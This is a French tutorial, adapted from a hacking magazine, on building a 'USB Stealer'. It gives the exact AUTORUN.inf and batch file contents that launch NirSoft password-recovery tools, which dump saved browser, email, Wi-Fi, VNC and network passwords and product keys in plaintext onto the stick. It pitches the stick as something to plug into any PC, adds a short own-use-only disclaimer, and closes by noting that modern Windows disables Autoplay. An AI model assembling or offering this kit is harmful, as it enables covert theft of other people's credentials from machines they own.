USB Stealer - Aspirez tous les mots de passe de votre PC sur une clé USB
Adaptation de l'article du magazine HACK & CRACK N°28
Qu'il s'agisse des mots de passe enregistrés dans votre navigateur, des mots de passe de serveurs en réseau, d'identifiant de connexion à vos mails sur Thunderbird, une clé USB Stealer est capable de tout renifler pour vous dresser une liste complète de vos différents identifiants, le tout en clair. C'est plutôt difficile à croire, mais c'est pourtant le cas! Nous allons donc ici vous expliquer pas à pas la marche à suivre pour créer votre propre clé USB Stealer. Vous pourrez ainsi brancher votre clé à n'importe quel PC pour scanner et récupérer automatiquement tous les identifiants détectables. Quand on voit la performance d'un tel outil, on se dit d'ailleurs qu'il faudrait protéger plus efficacement ses identifiants dans des coffres-forts... Pour l'heure, intéressons-nous aux USB Stealer.
UTILISEZ L'OUTIL A BON ESCIENT
On ne peut pas commencer cet article sans bien préciser aux lecteurs qu'un tel outil doit être correctement utilisé. Autrement dit, une clé USB Stealer ne devra jamais être utilisée dans le but de nuire à autrui, notamment en la branchant au PC d'un tiers dans l'objectif d'accéder aux comptes privés d'une personne. L'outil pourra être utilisé pour récupérer vos propres mots de passe. Par exemple, une clé USB Stealer peut vous être utile lorsque vous formatez votre PC : il suffit d'un tel outil pour rassembler tous vos identifiants au même endroit et donc gagner un temps précieux à la réinstallation de tous les accès. Utilisez donc l'outil de manière responsable.
PRÉPAREZ VOTRE CLÉ USB
Avant même de vous diriger vers la procédure de création de la clé USB, nous vous invitons à préparer en amont votre clé. Si vous avez de vieilles clés USB qui ne dépassent pas 1Go de stockage, vous pourriez apprécier de les utiliser pour ce type de mission. Cela vous permettra notamment de ne pas sacrifier une bonne clé USB de 8 Go ou plus et de recycler de vieilles clés! Après avoir branché la clé USB sur le PC, vous pourrez réalisez un clic droit sur
celle-ci, puis choisir "Formater". Vérifier préalablement que toutes vos données sont sauvegardées en local.
CRÉEZ VOTRE FICHIER AUTORUN
Maintenance que votre clé USB est prête, vous allez pouvoir créer un nouveau fichier texte sur celle-ci. Réalisez un clic droit à la racine de la clé et choisissez "Nouveau", puis "Document Texte". Vous devrez alors renseigner de manière exacte (copier/coller) le texte ci-dessous :
[autorun]
open=launch.bat
ACTION=Passer un scan
Après avoir renseigné ce texte, vous devrez enregistrer le document sous le nom "AUTORUN.inf" Vous devrez bien faire attention à afficher les extensions de noms de fichier et supprimer l'extension ".txt". Le fichier doit avoir comme aperçu un fichier blanc accompagné d'un engrenage.
CRÉEZ VOTRE BATCH
Une fois que vous avez créé votre fichier AUTORUN, qui permettra tout simplement de lancer automatiquement la procédure de scan de votre PC, vous pourrez créer ce que l'on appelle un "Batch". Ce fichier Batch intégrera tous les ordres que vous allez donner à différents logiciels pour rapatrier tous les identifiants souhaités . Créez à nouveau un fichier texte sur la clé USB, puis renseignez exactement les lignes suivantes :
Start mspass.exe/stext mspass.txt
Start mailpv.exe/stext mailpv.txt
Start iepv.exe/stext iepv.txt
Start PasswordFox.exe/stext PasswordFox.txt
Start OperaPassView.exe/stext OperaPassView.txt
Start ChromePass.exe /stext ChromePass.txt
Start Dialupass.exe /stext Dialupass. txt
Start netpass.exe /stext netpass.txt Start WirelessKeyView.exe /stext WirelessKeyView.txt
Start BulletsPassView. exe /stext BulletsPassView.txt
Start VNCPassView. exe /stext VNCPassView. txt
Start OpenFilesView. exe /stext OpenFilesView. txt
Start ProduKey.exe /stext ProduKey. txt
Start USBDeview.exe /stext USBDeview.txt
Enregistrez le fichier et nommez le "Launch.bat".
CONSTITUEZ VOTRE BIBLIOTHÈQUE DE LOGICIELS
Vous avez fait le plus dur! Vous avez créé votre fichier AUTORUN.inf et votre fichier LAUNCH.bat : maintenant, vous allez devoir télécharger chaque logiciel directement sur la clé USB. Cette procédure sera un peu répétitive, mais vous trouverez tous les logiciels sur le site de Nirsoft. Téléchargez donc un à un les logiciels suivants :
• Mspass
• Mailpv
• lepv
• PasswordFox
• OperaPassView
• ChromePass
• Dialupass
• Netpass
• WirelessKeyView
• BulletsPassView
• VNCPassView
• OpenedFilesView
• ProduKey
• USBDeview
TESTEZ VOTRE CLÉ
Maintenant que vous avez configuré votre clé USB, il ne reste plus qu'à tester votre nouvel outil. Pour cela, nous vous invitons à débrancher votre clé USB de votre PC, puis à la rebrancher. Si tout a bien été configurez une fenêtre devrait apparaître sur votre écran vous indiquant si vous souhaitez lancer un scan de votre PC.
Confirmez le lancement du scan. À partir de ce moment, tous les logiciels portables présents sur la clé USB seront sollicités pour parcourir le PC à la recherche d'identifiants. Une fois que ces identifiants seront repérés, les logiciels enregistreront de petits fichiers textes à la racine de la clé USB : dans ces fichiers textes, vous retrouverez la liste de tous les identifiants récupérés. Gardez bien votre clé de côté, car elle pourrait bien vous servir! Notez que vous pouvez, au besoin, ajouter d'autres logiciels de Nirsoft à la liste déjà préétablie.
À vous de modifier le fichier Batch et d'intégrer l'exécutable sur votre clé USB!
Note: l'Autoplay est désactivé par défaut sur les Windows modernes pour des raisons évidentes de sécurité, c'est à dire pour qu'il ne lance pas l'exécution automatique d'applications d'un périphérique externe (CD/DVD, clé USB) de fait le fichier LAUNCH.bat ne se lancera pas.